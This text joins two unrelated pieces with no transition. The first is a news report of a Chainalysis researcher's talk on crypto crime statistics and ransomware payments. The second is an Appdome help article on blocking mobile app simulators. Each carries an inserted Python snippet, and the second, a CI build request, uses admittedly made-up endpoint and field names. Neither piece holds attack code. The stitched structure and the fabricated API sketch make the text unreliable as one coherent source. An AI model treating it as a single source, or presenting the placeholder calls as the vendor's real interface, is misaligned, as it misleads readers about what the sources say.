Cryptocurrency’s decentralized, semi-anonymous nature makes it a uniquely appealing option for criminals. But unlike traditional forms of value transfer, cryptocurrency is inherently transparent in a publicly visible ledger, Kimberly Grauer, head of research at Chainalysis, explained.
With the right tools, such as blockchain analysis, defenders can gain unprecedented insight into criminal activity and the latest trends in crypto crime, she explained at the MIT Tech Review conference Cyber Secure.
“I’ve always had this lingering thought that cryptocurrency is an amazing tool for privacy, and you can transact anonymously, and so criminals are using it. There’s also the narrative that this technology enables transparency that has never been seen before. How are both of these things true at the same time? How is this the most private and the most transparent technology?” she said.
Both can be true at the same time, Grauer added.
Researchers were able to associate cryptocurrency addresses with services that fall under certain categories. Most cryptocurrency value is transferred through services such as darknet markets, child abuse materials, stolen crypto, scams, sanctions, gambling sites, retail exchanges, and others.
The researchers were also able to intersect this data with geography and make a cryptocurrency adoption index.
“We see cryptocurrency in countries where there's instability - countries like Venezuela or Kenya. And places where people are extremely digitally native, like Russia and Ukraine. There’s a lot of adoption of cryptocurrency in startups that are using cryptocurrency. We also see huge amounts of trading in China and the US,” Grauer said.
Their data can also help answer the question of why bitcoin has been going up lately. Last week, it rose above $19,783 – the previous record, reached in December 2017. And this year, the price is driven by different factors than in 2017.
“There are fewer retail investments that are just entering the market for the first time in small amounts. We see much larger transfers that are being sent to North American services. We’ve heard a lot about institutional investors coming in and being responsible for this more sustained growth,” she said.
Cryptocurrency analysis also helps to paint a clearer picture of how much people are using cryptocurrency to engage in illicit activities. In 2019, around 1% of all the cryptocurrency transfers were associated with illicit activity.
“For some people, it’s low, and for others - it’s high, and it depends on what you think about cryptocurrency space. In total, it’s $11.5 billion in criminal activity. We can see that a lot of that last year was driven by scams, Ponzi schemes as there’s still a lot of feelings that you can get rich with cryptocurrency. Also, there’s a broader audience than ever because there’s a lot of user-friendly technologies which made 2019 a rife year for criminal activity,” Grauer said.
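Taken together, the 1% share and the $11.5 billion figure imply the rough total scale of transfers observed that year. A back-of-envelope check (illustrative arithmetic, not a figure quoted in the talk):

```python
illicit_usd = 11.5e9   # $11.5 billion tied to criminal activity (2019)
illicit_share = 0.01   # roughly 1% of all cryptocurrency transfers

total_usd = illicit_usd / illicit_share
print(f"implied total transfer volume: ${total_usd / 1e12:.2f} trillion")
# implied total transfer volume: $1.15 trillion
```

That trillion-dollar denominator is why the same 1% can look either negligible or alarming depending on one's view of the space.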
This year, according to Grauer, will be dubbed the year of ransomware as researchers saw a 10x increase in ransom payments.
“We’re able to see criminals evolving in real-time because of the technology that blockchain has allowed. Last year, criminals were choosing two major off-ramps, called Binance and Huobi. Over 50% of all the stolen, darknet, and ransom money was winding up at those two services,” she said.
Researchers were also able to identify how many cryptocurrency deposit addresses were receiving money from illicit activities.
“In this case, we can see that a handful of deposit addresses were receiving most of those funds. There’s something institutional happening here. There’s something structural happening here, and we hypothesize that this has a lot to do with OTC (over-the-counter) brokers,” Grauer said.
So the paradox of cryptocurrency, according to her, is that people behind these activities stay anonymous. Yet, at the same time, “we can have a strong sense of what’s going on from the macro perspective.”
How to Block Simulators in Android & iOS Apps
Learn to Prevent Simulation in Mobile apps, in mobile CI/CD with a Data-Driven DevSecOps™ build system.
What is Simulation?
Simulators are virtualized tools that are used to run software tests on mobile apps inside flexible, software-defined environments. Hackers use simulators for malicious purposes as part of dynamic analysis efforts, where they run your mobile app in their own controlled environment to learn how your app behaves and interacts with other components or systems while it’s running.
Why Prevent Simulation in Mobile Apps?
Hackers use simulators to run mobile apps within their own controlled environment so they can mimic, observe, and study how a mobile app functions and behaves while the app is running. This lets them know how a mobile app behaves to help hackers build more effective attacks and attack methods.
For example, using simulators, hackers can observe how an app interacts with the mobile operating system, or study the methods and sequence by which the app connects to and authenticates with its backend. Simulators can also be used to observe how an app reads/writes to the filesystem (for instance, to learn if weak encryption is used, or no encryption at all).
Preventing Simulation on Mobile apps by Using Appdome
On Appdome, follow these 3 simple steps to create self-defending Mobile Apps that Prevent Simulation without an SDK or gateway:
Upload the Mobile App to Appdome.
Upload an app to Appdome’s Mobile App Security Build System
Upload Method: Appdome Console or DEV-API
Mobile App Formats: .ipa for iOS, or .apk or .aab for Android
Build the Protection: Prevent Running on Simulators.
Congratulations! The Prevent Running on Simulators protection is now added to the mobile app
Building Prevent Running on Simulators by using Appdome’s DEV-API:
Create and name the Fusion Set (security template) that will contain the Prevent Running on Simulators feature as shown below:
Follow the steps in Sections 2.2.1-2.2.2 of this article, Building the Prevent Running on Simulators feature via Appdome Console, to add the Prevent Running on Simulators feature to this Fusion Set.
Open the Fusion Set Detail Summary by clicking the “...” symbol on the far-right corner of the Fusion Set, as shown in Figure 1 above, and get the Fusion Set ID from the Fusion Set Detail Summary (as shown below):
Figure 2: Fusion Set Detail Summary
Note: Annotating the Fusion Set to identify the protection(s) selected is optional only (not mandatory).
Follow the instructions below to use the Fusion Set ID inside any standard mobile DevOps or CI/CD toolkit like Bitrise, App Center, Jenkins, Travis, Team City, Circle CI or other system:
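As a rough illustration of wiring a Fusion Set ID into a CI/CD step, here is a generic sketch. The endpoint URL, header, and field names below are hypothetical placeholders, not Appdome's actual DEV-API; consult Appdome's documentation for the real calls:

```python
import json

def make_build_request(api_token, fusion_set_id, app_path):
    # Assemble the request a CI step would send to a build service.
    # All names here are illustrative placeholders (assumptions).
    return {
        "url": "https://example.invalid/api/v1/build",   # placeholder endpoint
        "headers": {"Authorization": f"Bearer {api_token}"},
        "payload": {
            "fusion_set_id": fusion_set_id,  # copied from the Fusion Set summary
            "app": app_path,                 # the .ipa / .apk / .aab artifact
        },
    }

req = make_build_request("TOKEN", "fs-1234", "app-release.aab")
print(json.dumps(req["payload"], indent=2))
```

The key idea is that the Fusion Set ID travels as a build parameter, so every CI run applies the same security template to the uploaded binary.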
Figure 1: Fusion Set that will contain the Prevent Running on Simulators feature
Note: Naming the Fusion Set to correspond to the protection(s) selected is for illustration purposes only (not required).
Building the Prevent Running on Simulators feature via Appdome Console
To build the Prevent Running on Simulators protection by using Appdome Console, follow the instructions below.
Where: Inside the Appdome Console, go to Build > Security Tab > ONEShield™ section. Like all other options in ONEShield™, Simulation is turned on by default, as shown below:
Figure 3: Prevent Simulation option
Note: The App Compromise Notification contains an easy to follow default remediation path for the mobile app end user. You can customize this message as required to achieve brand specific support, workflow or other messaging.
When you select Prevent Running on Simulators, you'll notice that the Fusion Set you created in step 2.1.1 now bears the icon of the protection category that contains Prevent Running on Simulators.
Figure 4: Fusion Set that displays the newly added Prevent Running on Simulators protection
Click Build My App at the bottom of the Build Workflow (shown in Figure 3).
Certify the Prevent Running on Simulators feature in Mobile Apps.
After building Prevent Running on Simulators, Appdome generates a Certified Secure™ certificate to guarantee that the Prevent Running on Simulators protection has been added and is protecting the app. To verify that the Prevent Running on Simulators protection has been added to the mobile app, locate the protection in the Certified Secure™ certificate as shown below:
Figure 5: Certified Secure™ certificate
Each Certified Secure™ certificate provides DevOps and DevSecOps organizations the entire workflow summary, an audit trail of each build, and proof that Prevent Running on Simulators has been added to each mobile app. Certified Secure provides instant and in-line DevSecOps compliance certification that Prevent Running on Simulators and other mobile app security features are in each build of the mobile app.
Prerequisites to Using Prevent Running on Simulators:
To use Appdome’s mobile app security build system to Prevent Simulation, you’ll need:
- Appdome account (create a free Appdome account here)
- A license for Prevent Running on Simulators
- Mobile App (.ipa for iOS, or .apk or .aab for Android)
- Signing Credentials (see Signing Secure iOS and Android apps)
Using Appdome, there are no development or coding prerequisites to build secured Apps by using Prevent Running on Simulators. There is no SDK and no library to code or implement in the app and no gateway to deploy in your network. All protections are built into each app and the resulting app is self-defending and self-protecting.
Releasing and Publishing Mobile Apps with Prevent Running on Simulators
After successfully securing your app by using Appdome, there are several available options to complete your project, depending on your app lifecycle or workflow. These include:
- Customizing, Configuring & Branding Secure Mobile Apps
- Deploying/Publishing Secure mobile apps to Public or Private app stores
- Releasing Secured Android & iOS Apps built on Appdome.
All apps protected by Appdome are fully compatible with any public app store, including Apple App Store, Google Play, Huawei App Gallery and more.
Protections Similar to Prevent Running on Simulators
Here are a few related resources:
To learn all of the security features included in Appdome ONEShield, visit the OneShield Knowledge Base article.
If you have any questions, please send them our way at support.appdome.com or via the chat window on the Appdome platform.
Thanks for visiting Appdome! Our mission is to secure every app on the planet by making mobile app security easy. We hope we’re living up to the mission with your project.